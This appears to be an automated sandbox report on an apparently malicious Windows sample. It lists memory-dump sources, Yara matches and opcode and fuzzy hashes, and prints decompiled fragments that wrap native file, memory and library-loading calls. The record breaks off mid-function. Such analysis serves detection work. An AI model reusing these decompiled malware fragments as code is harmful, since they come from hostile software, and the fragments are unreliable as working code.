                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1eeea81f3bc0184d8c2fd7f462bb19997382ab3dcd6554bbee23c7ba0d092053
                          • Instruction ID: 72c498cb64719e6f79357fbc254c5870b5b1fa70c622ccb8b7d22fc24d13dd8a
                          • Opcode Fuzzy Hash: 1eeea81f3bc0184d8c2fd7f462bb19997382ab3dcd6554bbee23c7ba0d092053
                          • Instruction Fuzzy Hash: 38E08634A1110CEFDB00FFA8EA019ADB7BEEB48218B208458D80A97704DB712F019F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03b32592f52d5a0183e7e00a7f54eb2bdd4fc546382f5bc9dd7f234d8d03ceb3
                          • Instruction ID: afb9f16fb60b98285dedb5ab43c5e0f7b4c9b88c4440db3a19c414a578a783d1
                          • Opcode Fuzzy Hash: 03b32592f52d5a0183e7e00a7f54eb2bdd4fc546382f5bc9dd7f234d8d03ceb3
                          • Instruction Fuzzy Hash: C6E08C316041908FC700EAA8D844E863BB8DF89651B8440BEF409CB6A2DA619C02CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65e057f6e40e83c1c8fea353a0602087da129f40d873aeb15e79973fbe673a26
                          • Instruction ID: 6f9be7fa7af99632128c9c6bd947a6e38ad5ae07a288df5b76b7e14e99ac278a
                          • Opcode Fuzzy Hash: 65e057f6e40e83c1c8fea353a0602087da129f40d873aeb15e79973fbe673a26
                          • Instruction Fuzzy Hash: 30D0C7926886C00BCB53E3B8292838A2F840F63028B0B48DE88888E00BE405804BCB5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 910829a8149a87b39dc39b385492e38a5f5af1142a5fa3c7f7cb28f0c3030f3b
                          • Instruction ID: 5fa2441d111aab1f95f8231f95c2a199630e69764d2e7b26a2809b8be5b98c71
                          • Opcode Fuzzy Hash: 910829a8149a87b39dc39b385492e38a5f5af1142a5fa3c7f7cb28f0c3030f3b
                          • Instruction Fuzzy Hash: 79D0C9357101148FC704DB5DE44499537EDEF8D66579000BAF50ACB3A1DFA2AC428B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b2876c624622a25da00fa8acb0328473a0e42fb058433e118dd92095decf0f7
                          • Instruction ID: 7146847500c4b2f27ce982a08826d92c267b8c9ffba8d6a65d11b2fa2343da0d
                          • Opcode Fuzzy Hash: 6b2876c624622a25da00fa8acb0328473a0e42fb058433e118dd92095decf0f7
                          • Instruction Fuzzy Hash: 80C04C39110108EBCB05AF96E90A95D7F6AFFDC661B14C121F84946220DF73A9529EA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 951920d98794170d821997f2c2fa74c86a181e54a558bc55c7edbf26e27d40fd
                          • Instruction ID: 6e1ee4c18c2431bb490364048e75ed23b362c2a2ec119542ccc01fbea60c5356
                          • Opcode Fuzzy Hash: 951920d98794170d821997f2c2fa74c86a181e54a558bc55c7edbf26e27d40fd
                          • Instruction Fuzzy Hash: DBC02BBB2182421FD7473F30CD07F503EA2EF52304F49C082E28044070C215C026CB13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Memory Dump Source
                          • Source File: 00000000.00000002.356188894.00000000008E2000.00000002.00020000.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.356179496.00000000008E0000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.356252577.0000000000950000.00000002.00020000.sdmp
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2cf9592eb73a24eeaabeaec9907e40b3a51264934340253c52e985053bea5980
                          • Instruction ID: 16bfcbb246e73f5c5df48e8d5d74350c2117560efe1f0b0ed106cffa9a68eaae
                          • Opcode Fuzzy Hash: 2cf9592eb73a24eeaabeaec9907e40b3a51264934340253c52e985053bea5980
                          • Instruction Fuzzy Hash: 42C2126180E7C14FDB138B789CB5295BFB1AE6721871E49CBC0C1CF0A3E1195A6BD762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          C-Code - Quality: 36%
                          			E0041870C(void* __eflags, long _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                          				void* _v1;
                          				intOrPtr* __esi;
                          				void* __ebp;
                          				signed char _t11;
                          				void* _t15;
                          				void* _t16;
                          				intOrPtr* _t22;
                          
                          				asm("outsd");
                          				asm("aaa");
                          				if(__eflags <= 0) {
                          					asm("les edx, [edx+edx*2]");
                          					_t6 =  &_a12; // 0x413d72
                          					_t15 =  *((intOrPtr*)( *_t22))( *_t6, _a16, _a20, _a24, _a28, _a32, _t16, _t11 & 0x00000083); // executed
                          					return _t15;
                          				} else {
                          					__ebp = __esp;
                          					__eax = _a4;
                          					_t8 = __eax + 0x10; // 0x300
                          					_t9 = __eax + 0xc50; // 0x409763
                          					__esi = _t9;
                          					E004191E0(__edi, _a4, __esi,  *_t8, 0, 0x2c) =  *__esi;
                          					__eax = NtClose(_a8); // executed
                          					__esi = __esi;
                          					__ebp = __ebp;
                          					return __eax;
                          				}
                          			}

                          0x0041870c
                          0x0041870d
                          0x0041870e
                          0x004186b6
                          0x004186cd
                          0x004186d5
                          0x004186d9
                          0x00418710
                          0x00418711
                          0x00418713
                          0x00418716
                          0x0041871f
                          0x0041871f
                          0x0041872f
                          0x00418735
                          0x00418737
                          0x00418738
                          0x00418739
                          0x00418739

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseFileRead
                          • String ID: r=A$r=A
                          • API String ID: 752142053-687523353
                          • Opcode ID: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                          • Instruction ID: c55b9a0ab9c92f634dcec03df039051860dc37adbd83c16fa249bc5599e4b9db
                          • Opcode Fuzzy Hash: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                          • Instruction Fuzzy Hash: F3F037B6204109ABDB14EF98DC84EEB77ADEF8C350F148659FA1C97201C630EA518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 25%
                          			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
                          				void* _v5;
                          				signed char _t15;
                          				void* _t19;
                          				intOrPtr _t21;
                          				void* _t28;
                          				intOrPtr* _t29;
                          
                          				_t13 = _a4;
                          				_t29 = _a4 + 0xc48;
                          				E004191E0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                          				_t15 = _a36;
                          				_t6 =  &_a32; // 0x413d72
                          				_t21 =  *_t6;
                          				asm("les edx, [edx+edx*2]");
                          				_t12 =  &_a8; // 0x413d72
                          				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
                          				return _t19;
                          			}

                          0x00418693
                          0x0041869f
                          0x004186a7
                          0x004186af
                          0x004186b2
                          0x004186b2
                          0x004186b6
                          0x004186cd
                          0x004186d5
                          0x004186d9

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1:A$r=A$r=A
                          • API String ID: 2738559852-4243674446
                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                          • Instruction ID: 8bdd5aeda29f47ac0509a0170fa52686f44c6279ab4504c2a3c2d20870324ebe
                          • Opcode Fuzzy Hash: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                          • Instruction Fuzzy Hash: 67F014B6204189ABCB08CF98D885CEB77A9EF8C354B15864DFA0D93202C634E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                          • Instruction ID: aeb5714664a6f4c1001d9c77c1b6d016b203ec6e3297d5e22e6097ef29b6eef1
                          • Opcode Fuzzy Hash: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                          • Instruction Fuzzy Hash: CBF0F2B6204209ABDB14DF89DC85EEB77A9AF88354F118659FE0897241C634E910CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
                          • Instruction ID: 878fbbdb5b448471a8d4aa652203e5919befb66cfd9d585cb76835cf29415190
                          • Opcode Fuzzy Hash: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
                          • Instruction Fuzzy Hash: 149002B122100902D140719984047460109A7D0342F91C011A5454554EC6998DE577A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
                          • Instruction ID: aa4a37bed587550ef9467aec38bc1f07e25c5d06725e9b8f31570c41a0df4203
                          • Opcode Fuzzy Hash: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
                          • Instruction Fuzzy Hash: 589002A136100942D10061998414B060109E7E1342F91C015E1454554DC659CC627266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
                          • Instruction ID: 27e7f997586d380aa8351c15ef4d1ddb306e1541e4ff8f0d5d20cbba9319dea0
                          • Opcode Fuzzy Hash: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
                          • Instruction Fuzzy Hash: 31900261262046525545B1998404507410AB7E02827D1C012A1804950CC5669866E761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
                          • Instruction ID: 0269b32bcb8943da6e62541dce365fa93da17aec66b3f0b31f23f751275f1b2d
                          • Opcode Fuzzy Hash: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
                          • Instruction Fuzzy Hash: B790027122100913D11161998504707010DA7D0282FD1C412A0814558DD6968962B261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
                          • Instruction ID: bfa8fdb8e4f1e9375ae6f7c4cbd55992d2bbeb87acf3a0cd7365e287bc2878b8
                          • Opcode Fuzzy Hash: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
                          • Instruction Fuzzy Hash: 9990026162100A02D10171998404616010EA7D0282FD1C022A1414555ECA6589A2B271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
                          • Instruction ID: e9332fc8bb0adc80e2e26c0e1dbefcd5aeae9eec41da453da6b6b496f8d7e4b1
                          • Opcode Fuzzy Hash: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
                          • Instruction Fuzzy Hash: CD90027122140902D1006199881470B0109A7D0343F91C011A1554555DC665886176B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
                          • Instruction ID: 143a7bf3bb937a0808796b936fbf7c5c97e898ea99567b1e7e93baefa4b60ead
                          • Opcode Fuzzy Hash: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
                          • Instruction Fuzzy Hash: 2F90026162100542414071A9C8449064109BBE1252791C121A0D88550DC599887567A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
                          • Instruction ID: 3dd63de568deed24a6abd2691d5003fcd145389bfa706a0b607752b1d4141ecd
                          • Opcode Fuzzy Hash: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
                          • Instruction Fuzzy Hash: 1890026123180542D20065A98C14B070109A7D0343F91C115A0544554CC95588716661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
                          • Instruction ID: 835c2fd37c23f9b669f8d3973f5407af7e619d74afedc05e34640e8e4359f62c
                          • Opcode Fuzzy Hash: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
                          • Instruction Fuzzy Hash: 27900265231005030105A5994704507014AA7D5392391C021F1405550CD66188716261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
                          • Instruction ID: dd7c23fd0dee7fd67c33e8e4a1b251b386cac9f5ec6dd80891fc26a8f500fe13
                          • Opcode Fuzzy Hash: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
                          • Instruction Fuzzy Hash: BC9002A122200503410571998414616410EA7E0242B91C021E1404590DC56588A17265
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
                          • Instruction ID: 33ec6b234fbe1335bb6dee9a784c9534ad38a7603769ba20ecf1be3e2738427d
                          • Opcode Fuzzy Hash: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
                          • Instruction Fuzzy Hash: 9A90027122100902D10065D994086460109A7E0342F91D011A5414555EC6A588A17271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
                          • Instruction ID: 60cca144ea13a1c44bf713ae0616f1ca0481dbd98e999abc1decca50abe212cf
                          • Opcode Fuzzy Hash: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
                          • Instruction Fuzzy Hash: 7690026923300502D1807199940860A0109A7D1243FD1D415A0405558CC95588796361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
                          • Instruction ID: ada6d38c25df5381def28ef2eac5358349ae29dd26a4a19b1704bd73940ff84d
                          • Opcode Fuzzy Hash: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
                          • Instruction Fuzzy Hash: B290026132100503D140719994186064109F7E1342F91D011E0804554CD95588666362
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
                          • Instruction ID: e25ecb83a1500eccf144bfd0bc48860dd863ee1d7ff29b980610c4b52bfde9f1
                          • Opcode Fuzzy Hash: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
                          • Instruction Fuzzy Hash: 3690027133114902D1106199C4047060109A7D1242F91C411A0C14558DC6D588A17262
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                          • Instruction ID: 40df6e560410b834ef39bcc67f3213546e1b37eec6f129d181373a5b9c87354c
                          • Opcode Fuzzy Hash: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                          • Instruction Fuzzy Hash: 2690027122100D02D1807199840464A0109A7D1342FD1C015A0415654DCA558A6977E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                          • Instruction ID: fcf73888d072860bb51d07e3df836e37d8bf1f9d8d878cc2e1b118a7a1a7090e
                          • Opcode Fuzzy Hash: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                          • Instruction Fuzzy Hash: AB90027122108D02D1106199C40474A0109A7D0342F95C411A4814658DC6D588A17261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                          • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                          				void* _t10;
                          				void* _t15;
                          
                          				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                          				_t6 =  &_a8; // 0x413536
                          				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                          				return _t10;
                          			}
                          Instruction addresses: 0x004188c7, 0x004188d2, 0x004188dd, 0x004188e1

                          APIs
                          • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: 65A
                          • API String ID: 1279760036-2085483392
                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E00418923(void* __ebx, void* __ecx, int __edx, void* __eflags) {
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t10;
                          				char _t13;
                          				void* _t14;
                          				void* _t15;
                          				int _t17;
                          				void* _t20;
                          				void* _t23;
                          
                          				_t17 = __edx;
                          				_t15 = __ecx;
                          				_t14 = __ebx;
                          				_pop(_t10);
                          				if(__eflags > 0) {
                          					L5:
                          					_t8 = _t14 + 0x68b0c55;
                          					 *_t8 =  *((intOrPtr*)(_t14 + 0x68b0c55)) + _t15;
